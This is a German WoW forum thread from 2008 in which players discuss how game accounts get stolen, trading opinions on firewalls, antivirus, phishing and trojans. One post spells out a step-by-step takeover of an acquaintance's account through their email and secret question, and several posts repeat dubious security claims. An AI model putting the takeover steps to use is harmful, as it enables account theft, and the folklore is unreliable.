			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        





Und falls ihr wirklich auf der sicheren Seite fahren wollt .. Deinstalliert Windoof und macht euch Linux drauf ^^


----------



## Funaki2 (3. März 2008)

Also ich würd mal sagen, für den 0815 DAU ist Linux schonmal ein Fehlgriff, bis jener es konfiguriert und auf seine Speziellen Wünsche Abgestimmt hat, vergehen gut mal 2 Monate, kein normaler Mensch macht dass. 

Zum Thema Trojaner: Ich denke, dass Trojaner nicht mehr "so" gefährlich sind, die "normalen" Trojaner findet sogar Antivir. Gefährlicher sind meiner Meinung nach Rootkits, da es 1, Wenig Programme gibt, die sie erkennen und 2. Sie auch nicht normal entfernt werden können. 

Dazu kann ich nur Knopicilin und NOD32 Emfehlen. Wenn man Knopicilin startet, hat der Rootkit, Trojaner oder sonst irgend ein Virus schonmal keine Chance sich zu verstecken. Danach in Knopicilin NOD32 Starten und 90% der Viren sind draußen. NOD32 findet auch Viren, die nicht in seiner Datenbank sind, da seine heuristik eine der besten ist.

Achja und noch ein gute gemeinter Rat: macht ein Backup bevor ihr euer System konfiguriert, denn wenn ihr wirklich irgendwo einen extremen Systemschaden durch einen Virus habt, könnt ihr schlicht und einfach das Backupaufspielen, und alles ist wieder auf Anfang.

So Long Funaki

Wer Rechtschreibfehler findet, darf sie gerne behalten.


----------



## Te-Rax (9. März 2008)

Accounts werden meistens gehackt wenn man(n) einen China farmer zum leveln angesetzt hat, der 
-deinen Acc. zum Werbung machen benutzt
-Gold abzeckt
-Wenn der Acc. nicht gebannt ist, kriegste ihn halt nie wieder.


----------



## Spochtl (17. März 2008)

Te-Rax schrieb:


> Accounts werden meistens gehackt wenn man(n) einen China farmer zum leveln angesetzt hat, der
> -deinen Acc. zum Werbung machen benutzt
> -Gold abzeckt
> -Wenn der Acc. nicht gebannt ist, kriegste ihn halt nie wieder.



Den Account bekommst du wieder, weil du hast ja auch dafür gezahlt. Aber halt die Sachen die der Kerl gemacht hat können nicht rückgängig gemacht werden, z.b. das Inventar plündern oder alles verkaufen.

Ich finde es immernoch lustig das einige sich auf irgendwelche Programme verlassen und Ihr Hirn abschalten.
Installiert nur weiter eure Viren & Spywarescanner, Firewalls etc. Ich steck die CPU Zyklen lieber ins Spiel 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



@Funaki2
Na alles klar, dann lass mal WoW auf Cedega laufen, die Diashow ist echt kein Spaß.
Windows Firewall macht auch nix anderes als Ports zu blockieren oder zuzulassen. Das einzige was mal ging war ein alter Angriff bei dem sich ein Rechner selbst abgeschossen hat indem man Ihn veranlasst hat sich andauernd mit sich selbst zu verbinden. Das ging aber auch nicht übers Internet sondern nur über das LAN. Von daher kann man nicht sagen das die Windows Firewall sicher ist, aber was will ich auch die Verbindung zwischen meinen Router und meinen Rechner mit einem Packetfilter belasten?

@KnuP
Ja möglich ist es, ich habs auch schon mehrfach probiert, aber die Emulation von dem Spiel ist dann so langsam das es fast unmöglich ist nach Shattrath zu fliegen oder andere Hauptstädte. 
WoW ist der einzige daseins Grund meines Windows Systems, alles andere Emuliere ich oder startet es in VirtualBox.


----------



## ichbinnichtschuld (18. März 2008)

hacken klingt so kriminell, dabei wette ich nichmal 1% der leute wurden wirklich gehackt.
99% der leute haben entweder auf gefaketen seiten ihre daten eingeben udn nciht die url gelesen oder haben sich auf dubiosen seiten, emails, downloads keylogger eingefangen. aber gehackt wurden wohl die wenigsten.


----------



## Minastirit (18. März 2008)

Maelinda schrieb:


> Um es euch ein wenig zu erleichtern hier noch ein paar fragen von mir:
> 
> - verwendet ihr eine firewall (welche?) jap .. f-secure
> - verwendet ihr eine antivirus software (welche?) jo kasperky
> ...



wurd bis jetzte nie gehackt  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Huntergottheit (18. März 2008)

mir hat mein freund mal gezeigt wie man einen macht irgendwie was im  text schreiben oder so dann gingen bei dem rechnern des laufwerk immer auf und zu


----------



## Spochtl (19. März 2008)

Huntergottheit schrieb:


> mir hat mein freund mal gezeigt wie man einen macht irgendwie was im  text schreiben oder so dann gingen bei dem rechnern des laufwerk immer auf und zu




Jaaa, tut nur alle eure Unwissenheit Kund 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Scriptkiddie kann man hier sogar wörtlich nehmen 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Ein Laufwerk auf und zu machen ist das wohl einfachste auf den Planeten, jeder Depp bekommt das mit einem Shellscript hin oder bedient sich, inkompetent und unwissend, einfach vorhandener Virenbaukits wie BO2k. "Server" einrichten und der Person schicken, die ist so dumm und macht den auf, zack hab ich und jeder andere auch Zugriff auf die Kiste dank standard Passwörter. Ihr könnt dazu jeden Kindervirus hernehmen, NetBus, Sub7/SubSeven usw. . Alles Kinderzeug für die Kinderzimmer, solcher Müll kommt nichtmal mehr an den Virengateways bei den großen Mailprovidern durch, da bleibt nur die möglichkeit einen Idioten zu finden der in der MSN/ICQ/Jabber/<your favorit Instant Messanger> Liste steht, das Teil über den Dateiempfang annimmt und dann auch noch so dumm ist das Programm zu starten. Wer so blöd ist und alles startet was einem geschickt wird der ist selbst schuld.

Grad hab ich noch gelesen das man über MP3 keine Viren einschleusen kann. Das stimmt so nicht ganz, in MP3 und JPEGs wurden schon erfolgreich Scripte eingeschleust die dann den Virus nachgeladen haben, das ist das eines Fehlers in Winamp und dem WMP sogar recht einfach gewesen. Bei den JPEGs gibt es sogar Anwendung bei XSS Angriffen auf Webseiten, ein gepatcher Firefox lacht über sowas allerdings.
Für Winamp gab es auch möglichkeiten eine Skindatei zu bauen die den Virus nachgeladen hat.

Möglichkeiten Code einzuschleusen gibt es immer, egal welches Dateiformat man hat. Es wurden schon Macroviren gemacht in Word Dokumenten die den Rechner gelöscht haben oder mehr. Selbst MPEGs sind nicht sicher. Also nicht so vorschnell sagen das es Dateien gibt die man nicht verseuchen kann.
Für Firefox gibt es die möglichkeit mit Hilfe des Benutzers Spyware in Form eines Addons zu installieren, egal ob Linux oder Windows. Opera geht das ähnlich.

Hacken ist nicht böse, eigentlich heißt es richtig Cracken oder das man gecrackt wurde. Dank der Inkompetenz der Medien, Politiker und anderen Anfängern ist Hacken jetzt böse. Hacken heißt aber nichts anderes als eine Intelligente Lösung für ein Problem zu finden. Das kann jetzt ein Programmierfehler sein oder das man via "Reverse Grafittie" einer Straftat entgeht. Aber da Hacken ja viel schöner klingt als Cracken wurde das eben zum Synonym für die Bösen Leute im Internet, den "Hackern".

Softwarefirewalls kann man in die Tonne treten, Virenscanner auch.
Wenn das System gut eingerichtet ist (und ich denke das hier die wenigsten sagen können das sie Ihre System sicher haben) braucht man beides nicht. Spyware Scanner brauchen auch nur die Kindernet Exploited Nutzer, was für Spyware kann sich in nichtvorhandene Active X Controlls in Opera oder Firefox/Mozilla einnisten? Nur die wo eine PEBKAC vorliegt.

So, jetzt bin ich gespannt wer als nächstes Prallt das er "hacken" kann 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 Ich find es bisher lustig in dem Thread *einkuschel*

p.s. Nein, ich ändere keine Links ab. Sicherheitsinformationen sollte man einsehen können und auch selbst testen, da kann jemand ein Hackerparagraphen schreiben wie er will.


----------



## Khem (19. März 2008)

Scárfáce123 schrieb:


> allein dieses und du bist hacked sagt alles aus was du über hacken weisst Mr. Untergrundszene rofl



hahaha lol als ich das gelesen habe, habe ich das gleiche gedacht wie du scar.. Mr. Untergrund hahaha lol ich leg mich weg.. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## HassanDerHarte (9. August 2008)

Servus zusammen,

hab das hier alles mal verfolgt und bin echt erstaunt. Ich weis der Thread ist jez schon etwas älter, ich hab aber trotzdem mal n paar Fragen, grad zu den Sachen bezüglich: - Unseriöse Seiten bzw. Filesharing usw....(weil jemand geschrieben hatte dass Würmer/Trojaner/Keylogger nicht in Jpeg, Mpegs usw. drin sein können...

Ich selber lad viel Filme un n bißchen Musik (ok, illegal, ich weis) und hab erst vor kurzem mal ne mpeg oder avi datei einfach so geöffnet nachm runterladen (ohne auf Viren zu prüfen)..dann bekam ich die Meldung "Fehler in Explorer.exe" - Explorer muss geschlossen werden, oder so. Das Problem tritt häufiger auf, gerade bei neu runtergeladenen Files..daraufhin schließt sich der Explorer und "bootet" sozusagen neu...hat mich sehr verwundert da ich auch bißchen Sicherheitsfanatisch bin und immer versuch nix auf mein Pc zu lassen. Aber wie gesagt, eigentlich hab ich keine Ahnung von sowas....

Deshalb die Frage an euch, kann das auch sowas wie n Trojaner oder Ähnliches sein ? Oder noch wichtiger: Wie gefährlich ist sowas, da auch teilweise Prozesse im Taskmanager laufen bzw. neu erscheinen (genauso wie die youshouldntseeme.exe).....

Bitte um Antwort.....Vielen Dank!


Benutze:
- firewall
- router+firewall (+leider paar offene Ports)
- Kaspersky


----------



## MihAmb (9. August 2008)

soweit ich informiert bin, ist "hacken" in bezug auf wow account generell das falsche wort... dazu müsste der "hacker" auf den blizzard-server zugreifen können um somit an/in den account zu gelangen... was hier geschieht ist die spionage von passwörtern per keylogger oder gefakte internetseiten, nichts weiter

was ich absolut sinnlos finde ist die frage des TE "warum wurdet ihr gehackt?"

--> was weiß ich? weil mein pc nicht genug geschützt war? weil ich mir dadurch nen keylogger zugezogen hab?


----------



## Nyscha (9. August 2008)

HassanDerHarte schrieb:


> Servus zusammen,
> 
> hab das hier alles mal verfolgt und bin echt erstaunt. Ich weis der Thread ist jez schon etwas älter, ich hab aber trotzdem mal n paar Fragen, grad zu den Sachen bezüglich: - Unseriöse Seiten bzw. Filesharing usw....(weil jemand geschrieben hatte dass Würmer/Trojaner/Keylogger nicht in Jpeg, Mpegs usw. drin sein können...
> 
> ...




Hey 

Ist zwar bisschen Off-Topic , aber ich erwähne es trotzdem ma.
Mit Kaspersky wäre ich sowieso was vorsichtiger was Downloaden angeht.
Ich hab mal gehört (keine Ahnung ob es stimmt),dass Kaspersky mit BND (oder so ne ähnliche ecke) zusammenarbeitet.
Ja keine Ahnung obs jetzt BND ist aufjedenfall so in der Ecke irgendwas.

Dürfen die das eigentlich ?  Mit anderen Leuten Vertrag abschließen  ? Sie müssten dann och eigentlich die Kunden bescheid sagen oder nicht ?

Gruß
Nyscha


----------



## Visssion (9. August 2008)

OMG du willst doch nur die infos damit du unsere accs hacken kannst -.- löscht den treath und so ...


----------



## HassanDerHarte (9. August 2008)

Visssion schrieb:


> OMG du willst doch nur die infos damit du unsere accs hacken kannst -.- löscht den treath und so ...




Nene, ist echt ernstgemeint,...grad weil ich kein plan davon hab. Vielleicht hat schonmal jemand das gleiche Problem gehabt !? Sorry, hab net gesehn dass es hier um WoW geht...

Grad wegen Kaspersky,..ich hab schon viele Virenscanner durch (Antivir, Zonealarm un alles mögliche), aber in jedem Forum wird irgendeiner schlecht gemacht :-) Aber ich denk mal dass hier einigermaßen fähige Leute im Forum sind die mir vielleicht helfen können..

Hab schonmal versucht Linux auf ne schreibgeschützte SD-Karte zu bauen und von der zu booten, (hab aber wie gesagt keine Ahnung wie sowas geht) weil n Freund mir das empfohlen hat....

Deshalb danke schonmal, ist kein Fake..habt wahrscheinlich mich schon gehackt ihr Zigeuner ;-)


----------



## Crackmack (9. August 2008)

Minastirit schrieb:


> wurd bis jetzte nie gehackt
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.




Das wird sich glei ändern *böse grins* muhahahahaahahahahahaha 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        





\\\Edit///

Aja wurde auch schon ma gehackt Betaphishingseite "-.-


Jetzt denke ich: wie blöd muss man sein xD


----------



## Two (10. August 2008)

Devilyn schrieb:


> halt mit seltsammen beta invites etc. oder kaufen gold und lassen sich power lvln^^


 
nun ja man kann auch nicht sagen das alle komischen beta inv nicht echt sind
ich fidne die beta inc  e mail sieht auch nicht sehr echt aus ist bei mir im spam ordner gelandet
habe es mir aber trotzdem angesehen und es war wirklich die echte hab halt alles gelesen und die links verglichen :-)


----------



## turageo (10. August 2008)

Marakesh2k5 schrieb:


> ich hab noch nie so viel müll gelesen wie das ^^



Beschwer Du Dich mal bitte nicht über andere... Man kann über einige Umwege einen Trojaner über eine JPG in ein System schleußen - als MP3 sogar
noch wesentlich einfacher, aber für weitere Details such Dir mal bei Google ein landläufiges Trojanerboard, da gibts die Anleitungen zuhauf, die zumindest
bei Feld-Wald-und-Wiesen-Benutzern ganz gut funktionieren dürften.

Das Antivir manchmal nicht so dolle ist, ist zwar bekannt, gleiches gilt aber auch für alle anderen Virenprogramme. Du hast nirgendwo eine 100%ige
Sicherheit, dass mal was nicht erkannt wird. Gleiches gilt auch bei den Softwarefirewalls. Routerfirewall ist an und für sich zwar gut und schön, aber
auch irgendwie n bissl sinnlos, da meistens ziemlich schnell geknackt (wenn der Router mal offen ist, bringt Dir selbst die beste routerintegrierte
Firewall nix mehr).

Mit den Net-Commands muss ich Dir aber Recht geben, das funktioniert bei fast jeder Softwarefirewall, außer den wenigen die einen Schutz auf den
Dienst oder einen automatischen Restart haben. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Zu Linux: Naja, Du kannst aber nicht ernsthaft von Windows-verwöhnten Usern erwarten auf einmal Linux-Fanboys zu werden, oder? Die Umstellung
dürfte sich für die meisten unbedarften Nutzer als herbe Herausforderung gestalten (spätestens wenn mal die ersten Treiber nicht funzen oder unauffindbar
sind). Das haben schon einige Leute hier mal erwähnt, dass Linux nicht das Gelbe von Ei für die Allgemeinheit ist, da einfach zu viel Gewöhnung an Windoof
vorherrscht...

BTT: Die Hacks Dir mir bekannt sind, waren alleine zwei durch Links im buffed-Forum auf angebliche Beta-Sites, einen durch einen infizierten Rechner
im Netzwerk (interessanterweise war der PC mit WoW selbst komplett viren- und trojanerfrei) und noch einen durch schiere Dummheit, bei dem auf eine
Phishing-Mail geantwortet wurde. Manchen Leuten kann man erklären soviel man will, da sind se manchmal ziemlich merkbefreit.

Mfg


----------



## Two (10. August 2008)

Karmon schrieb:


> ich versteh nich wie leute überhaupt so besessen sein könn, viren zu entwickeln?
> bringen einem doch  sowieso nix... na kla... irgend n trojaner um daten auzuspähen, aber es gibt ja auch viren die den pc einfach nur zerstören oder chaos anrichten... da kannste ja noch nich mal das dumme gesicht sehn von dem denns erwischt hat...
> naja, mir solls egal sein, ich hab nen mac^^


es gibt leute die zerstören lieber 
sieht man auch zum teil in wow :-)

ach ja warum soll es dir egeal sein? auf mac kommen genau so viren wie auf alle andern 
wenn deina rgument jetzt ist es haben nicht so viele das es nicht lohnt, es gibt mehr als genug. Ich war letztes jahr bei meinen verwanten in amerika und da hatten einige einen mac Apple ist da sehr verbreitet und kommt in deutschland auch immer mehr


----------



## Funaki2 (10. August 2008)

Sozial Engineering ist DAS Stichwort zum Hacken!

90% Der "Hacks" kommen von Sozial Engineering, also, dass die leute einfach auf die einfachsten Tricks hereinfallen. Die Myspace Seite von Haris Pilton wurde so geknackt, und die von der andern Schnappsdrossel.

Dieser Typ hat bei T-Mobile angerufen und gemeint, dass er vom Hauptteil kommt und schnell was checken muss. 

Ja ...

Google Sozial Engineering


----------



## HassanDerHarte (10. August 2008)

Sorry, ich weis bei mir geht s nicht direkt um WoW und Accounthacking oder "cracking" wie s hier manche leute bezeichnen...

Aber kann man ohne Probleme Files online stellen (oder gestellt bekommen) und dadurch viren/rootkits draufinstalliert bekonmen ohne dass man s merkt ???? Frag grad nochmal wegen dem Explorer.exe fehler im vorhergegangenen Kommentar. Hab übrigens auch n WoW-Trial Account, wenn jemand den hacken will bin ich bereit dazu :-) (nur so, dass was zum Thema dasteht ;-) )

Danke....


----------



## Einsam (10. August 2008)

Maelinda schrieb:


> Da in meinem bekanntenkreis (raid, gilde, freunde) immer wieder leute gehackt werden, hab ich mal ein wenig nachgefragt, was sie glauben, wie sie gehackt wurden. Da das aber nicht übermäßig viele sind und ich schon ganz gern wissen würde, wie die hacker das machen, möchte ich hier auch noch fragen, was ihr denkt oder wie es euch passiert ist.
> 
> Ich bitte euch ehrlich zu sein und hoffe auf zahlreiche antworten
> 
> ...



okay nicht ganz nüchtern den am 9.8 geuztag umd voll bedoffen....

- verwendet ihr eine firewall (welche?)
ja und zwar ne hardwarefirewall... das mindeste was heute benutzt werden sollte da die haker total underfordert siund und weit mehr als genug iopfer funden!

- verwendet ihr eine antivirus software (welche?)
na sit geraumer zeit macafi oder wie man das scheiss mozente programm nennen kann... alda frag mich wen ich nüchtern binn!

- nutzt ihr filesharingprogramme (welche?)
auser rapidshare für legale zweke nicht!

- habt ihr eine "dubiose" seite besucht in letzter zeit? (ob absichtlich oder nicht)
google spuckt immer wiece scheisse aus... was soll man da macghen..... muh

- welchen internetbrowser verwendet ihr
i nwer explorerr.... warum solte ich auf einen browser zurükgreifen der kostenlos ist und mit freiwilignen spenden seine adons oder updates finanziert

nach einem kakao und reichlich überlegung erliche antworten....aber warum löschen?

mfg
einsam


----------



## the Huntress (10. August 2008)

- verwendet ihr eine firewall (welche?)
Vorhanden. Dank dem regelmäßigen Security Update von Apple.
- verwendet ihr eine antivirus software (welche?)
Vorhanden. Dank dem regelmäßigen Security Update von Apple. // Unter Windows XP AntiVir
- nutzt ihr filesharingprogramme (welche?)
Rapidshare etc. für legale Zwecke.
- habt ihr eine "dubiose" seite besucht in letzter zeit? (ob absichtlich oder nicht)
Ich besuche nur gezielt verschiedene Foren und googel sonst eher wenig, daher -> nein.
- welchen internetbrowser verwendet ihr
Safari 3.1.2


Bis jetzt noch nie irgendwas passiert.  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Korri (10. August 2008)

cazimir schrieb:


> Es gibt genug Sicherheitslücken in Windows und Co., sodass ich unbemerkt Keylogger installieren lassen. Die meisten Betreiber der Seiten wissen noch nicht ein mal, dass sie solch einen Keylogger verbreiten. Du selber merkst es auch nicht, und es gibt so viele Varianten von Trojaner/Logger, dass die Antivirensoftwareherstellen nie alle erkennen können. Von daher GL HF xD
> 
> Ich selber benutze VirtualPC und emuliere meinen Rechner, mit den ich surfe und chatte. So hab ich wenigstens ein bisschen Sicherheit, aber sicher bist du nie.
> 
> ...



Und wie schützen sich dann Blizz und buffed vor Hackern wenn jeder der will jeden hacken kann?


----------



## Skua (10. August 2008)

- verwendet ihr eine firewall (welche?)
nur den normalen Paketfilter im Router (wird auch gerne HW Firewall genannt ^^)

- verwendet ihr eine antivirus software (welche?)
nö ^^

- nutzt ihr filesharingprogramme (welche?)
nö

- habt ihr eine "dubiose" seite besucht in letzter zeit? (ob absichtlich oder nicht)
ständig 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



- welchen internetbrowser verwendet ihr
firefox3 atm (irgendwo oben war von "ie - warum einen kostenlosen / über Spenden finanzierten Browser einsetzen?" die Rede - damit war wohl der ff (und vergleichbares) gemeint - warum man den einsetzen sollte? weil er open source ist und das immer noch die beste Sicherheit bietet ^^


Diese Fragen haben btw oben gefehlt: 

Welches OS benutzt ihr?
Linux (das erklärt wohl auch warum ich keinen Antivir habe ^^)

Nutzt ihr den OS internen Update Mechanismus?
Klar - täglich prüft mein OS auf Updates und installiert diese nach einem kurzen Check meinerseits 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Bei Linux geht das zu 99,9% ein Glück ohne Neustart ^^


Kleine Anmerkung meinerseits:

Sollten jetzt alle auf Linux umsteigen?
Nein bloß nicht - erstens ist es nicht leicht zu konfigurieren / am Laufen zu lassen und zweitens bräuchte ich ja dann irgendwann einen Virenscanner wenn das OS Mainstream wird (im Moment gibt es zwar auch schon eine Hand voll Scanner für Linux - der einzige Grund diese zu verwenden ist allerdings, wenn man parallel Win installiert hat und keine Daten ungeprüft "durchreichen" will).


----------



## Nehar (10. August 2008)

Maelinda schrieb:


> - verwendet ihr eine firewall (welche?)
> - verwendet ihr eine antivirus software (welche?)
> - nutzt ihr filesharingprogramme (welche?)
> - habt ihr eine "dubiose" seite besucht in letzter zeit? (ob absichtlich oder nicht)
> ...




1. : Nein.
2. Nein.
3. Nein.
4. Nicht dubios genug.
5. FF/Opera/Ie - mal so mal so.

Und ich wurde noch nicht gehackt. Von den Punkten die du aufzählst ist nur einer Wichtig, nämlich die dubiosen Seiten. AV Progs und Firewalls sind doch nur was für Mädchen, h4xX9rS und 'Neulinge'. Das ganze lähmt nur den PC und ist, bei richtiger Anwendung natürlich, unwichtig. Solange man nicht auf Seiten geht, wo es die neuesten Keys per Suchmaschine gibt o.Ä. hat auch keine Probleme. Genausowenig wie der jenige, der nicht jede mEeeEsSEeXxYY.jpg öffnet.


Und btw, mit AV/Firewall brauch man sich nicht sicher fühlen..... war selber mal für 1-2 Wochen in dieser Scriptkiddy "szene" (was ein kümmel wort Oo) und wirklich JEDES Av Prog und wirklich JEDE Firewall ist sogar von so einem dummen Bub, wie ich es war, innerhalb von 20mins zu umgehen.


Ja ich weiss, der Post klingt komplett danach, als würde ich mich besonders cool, elitär und gefährlich fühlen. Ist zwar der Fall, trodzdem stimmt was da steht =)


Mein, wirklich sehr beschränktes Halbwissen, bezieht sich natürlich nur auf Privatcomputer. Von Servern "hacken" o.Ä. habe ich keinerlei Ahnung. Wenn ich was gemacht habe, dann habe ich einem Freund, mit seinem vollen Einverständniss und nur zu Testzwecken, nur eine jpg von meiner heissen Schwester geschickt. Das Dingsens hat dann halt im Hintergrund was installiert =)


Also, nicht iwelchen kack annehmen. So notgeil ihr gerade auch seid =)


----------



## Blackywulf (10. August 2008)

*kichert* Meist eigentlich einfacher als gedacht,im meisten fall passiert der hack nicht umsonst im bekannten kreis,Gute freunde die halt deine daten kennen,oder mal kannten,bzw deine email kennen(ink pw)..oder sogar deine geheimfrage kennen,und mit diesen schönen dingen hat man einen neuen acc für sich...Erster schritt wär dort email pw für einen kurzen zeitraum andern..nun geht der schritt auf die WoW Page..dort wird die funktion "pw" vergessen genutzt..um dort deine email anzugeben und deine geheimantwort die meist einfach sind als guter bekannter...nun wird dir ein neues pw geschickt zu dessen email 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 ..dieses pw wird gemerkt und die email wird gelöscht(komplet löschen).. 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 der nächste schritt ist nun die email anderung,du logst dich nun halt mit dem benutzer namen und neuen pw ein..und wählst eine belibiege email addresse die dir gehört und es für eine bestätigung email zu deinem opfer geschickt die du denn bestätigst..nun werden alle daten auf deine email geschickt...diese email wird nartürlich auch komplet gelöscht...Glückwunsch..nun bist du stolzer besitzer eines accounts eines guten bekannten 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

..das gleiche geht auch meist mit "dummen" 12jährigen die dir lügen glauben wie zbs "Mein Kumpel arbeitet als GM und kann dir gold schicken"..blabla 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 "dafür ist aber deine email/+pw notwendig und dein acc name" ;D

Nun ist es dir möglich das bekommene pw wieder zu andern mit den daten die du bekommen hast 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

..und aus sicherheit anderst du das pw zuruck von der email addresse..um kein verdacht schöpfen zu lassen 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        





o_O Ich hafte für niemanden der das hier benutzen würde...


----------



## QcK (10. August 2008)

Scárfáce123 schrieb:


> allein dieses und du bist hacked sagt alles aus was du über hacken weisst Mr. Untergrundszene rofl



Er ist ein potentielles Script Kiddy x)


----------



## Rexxorian (20. September 2008)

Hallo. Also ich wurde bis Dato noch nicht wirklich gehackt. Mir fehlten einmal eine Menga an Gegenständen, aber nur VerzauberungsMaterialien. Ich denke heute, dass es jemand von meinen damaligen "Freunden" waren, die Zugang zum Account hatten, da ich ihnen vertraut habe. Seit dem Vorfall hat niemand mehr meine Daten bekommen und es ist auch nichts mehr vorgefallen. Hier noch ein paar Dinge zwecks eurer Sicherheit: Die Windowsfirewall allein reicht keinesfalls aus, da sie nur wichtige Hauptprogramme erst wirklich bemerkt. Zur Antiviren Software kann ich nicht viel sagen, da ich keine nutze und noch nie eine gebraucht habe. Ich lade mir jeden Monat das aktuelle Microsoft-Tool zum entfernen bösartiger Software runter und habe noch nie einen Virus auf meinem PC gehabt. Ich nutze die Sygate Firewall( für Privatnutzer kostenlos) in leicht abgeänderter Form. Ich sehe alles was rein oder raus will und muss das jeweilige bestätigen, damit Daten hindurch können. Die Firewall hält ALLES auf, ist dazu selbst noch mit einem 32-stelligem Passwort geschützt und eh sie was durch lassen würde, würde sich eher der Rechner aufhängen. Soweit, so gut. Passt auf eure Daten auf, gebt sie keinen Dritten weiter. Ich kann diese Firewall nur empfehlen, denn sie ist leicht zu bedienen und eine der sichersten, die ich kenne. Versucht eure Passwörter sinnvoll zu gestalten, Passwörter wie "Harald2" oder "Tischkante17" sind nicht wirklich sichere Passwörter. Einen Link zur Firewall werde ich nicht rein stellen, aber ihr könnt diese über google finden, wenn ihr als Suchbegriff "Sygate" eingebt. Das erste Ergebnis ist dann die Hauptseite. Sollten noch Fragen bestehen, schreibt mir eine Nachicht oder meldet euch hier im Forum. Bis dahin MFG


----------



## Nakati (20. September 2008)

allergeilste is immernoch RealVNC,

haste das installed un den port für remote frei, dann kanns schnell passieren dass dein pc selbstständig fenster öffnet und dir böse zeilen schreibt und plötzlich etwas downloadet ^^

also niemals ports so einfach freigeben, schon gar nicht VNC^^


----------



## ANubiZzz (20. September 2008)

Rexxorian schrieb:


> Die Windowsfirewall allein reicht keinesfalls aus, da sie nur wichtige Hauptprogramme erst wirklich bemerkt.



was Will er uns damit sagen?



Rexxorian schrieb:


> Zur Antiviren Software kann ich nicht viel sagen, da ich keine nutze und noch nie eine gebraucht habe.
> Ich lade mir jeden Monat das aktuelle Microsoft-Tool zum entfernen bösartiger Software runter und habe noch nie einen Virus auf meinem PC gehabt.


schütte doch gleich benzin ins feuer, die mic soft shice kannste an die wand nageln, genau so wie dies "live on care".  die bekommen es seit jahren net hin n vernünftiges OS hinzustellen aber hauptsache viren JEAHHH.


----------



## Laeknishendr (20. September 2008)

Navyraiser schrieb:


> alsoo ich war ca. n halbes jahr in der underground szene hab zwar keine wow accounts gehackt aber naja..eins vorweg wenn dich wirklich jemand hacken will denn schafft derjenige es auch. in den meisten fällen wird es durch trojaner gemacht das sind kleinste datein ca. 300kb groß diese stecken sie in große datein wie z.b. mp3s bieten diese als download an.. du lädst diese runter klickst auf den mp3 (trojaner) und du bist hacked. der jenige der den trojaner on gestellt hat hat vollen zugriff auf dein pc kann sehen was du schreibst (keylogger) kann datein von deinem pc laden datein auf dein pc mache z.b. neue viren etc. und sonmit kann derjenige auch ganz leicht die wow daten "besorgen". ich will jetzt kein roman schreiben deswegen geb ich dir jetzt ein paar tipps.. firewall: windows firewall reicht antivir: ich benutze antivir reicht vollkommen damit scannst du deine dateien die du dir geloadet hast bevor du diese nur anklickst filesharing: nicht sehr ratsam falls ja pass auf was du loadest und scann die datein bevor du diese benutzt. internetbrwoser: is egal nach deiner wahl. das aller wichtigste ist geh auf keine seiten die dir nicht vertraunswürdig erscheinen lad keine datein herunter die dir nicht vertraunswürdig erscheinen. leute die dich einfach bei icq adden und dir datein senden ..NICHT anehmen ganz klar. zum schluss nochmal pass auf wo du dich im www bewegst und denk dran wenn jemand dich hacken will schafft derjenige es auch.
> 
> rechtschreibfehler könnt ihr behalten
> 
> ...



Wenn Dein Quellcode genauso sauber ist wie Deine Rechtschreibung und Interpunktion dann habe ich keine Angst vor solchen "Hackern"


----------



## David (20. September 2008)

Ich glaube nicht, dass Windows oder ein offener Port immer der Grund für "Hacks" sind, sondern eher die Dummheit des Users.
IE & Outlook Benutzer, Newbies die auf Phishing reinfallen, Accounts tauschen oder sonst irgendwie blauäugig durch das World Wide Web gehen.


----------



## Ren-Alekz (20. September 2008)

Karmon schrieb:


> ich versteh nich wie leute überhaupt so besessen sein könn, viren zu entwickeln?
> bringen einem doch  sowieso nix... na kla... irgend n trojaner um daten auzuspähen, aber es gibt ja auch viren die den pc einfach nur zerstören oder chaos anrichten... da kannste ja noch nich mal das dumme gesicht sehn von dem denns erwischt hat...
> naja, mir solls egal sein, ich hab nen mac^^



Die meisten Viren werden auch von Aniti Viren Software Herstellern programmiert und verbreitet 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## L-MWarFReak (20. September 2008)

ja mein bro, is ein Funhacker^^ aber nicht bei wow accounts, und er macht auch nix kaputt usw. von daher bin ich bestens geschützt 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Zalasta (20. September 2008)

Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Dat, und alles is gut.


----------



## Galain (20. September 2008)

Zalasta schrieb:


> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
> 
> 
> 
> ...


/signed


----------



## tschilpi (20. September 2008)

Auch mit dem Teil ist nicht unbedingt alles gut.
Es gibt Progs die sich mit dem Code einloggen können bevor das System es kapiert hat.
100% Hack-Schutz gibt es NIE! Man kann den Schutz einfach nur verbessern, aber jeder kann grundsätzlich gehackt werden..
Manchmal ist es sehr einfach jemanden zu hacken, nehmen wir z.B mal die berühmte Geheimfrage.
Da sollte man etwas Passwortähnliches als Antwort nehmen.
Nehmen wir an ich kenne die yahoo.com Addy von jemandem. (Was ja wirklich nicht schwer ist^^)
Nun klicke ich auf Passwort vergessen und mir wird die Geheimfrage gestellt.
Kommt z.B was wie Wie ist der Name deines Vaters, dann geht es wohl nicht einfacher. (Sofern man eine echte Antwort eingegeben hat)
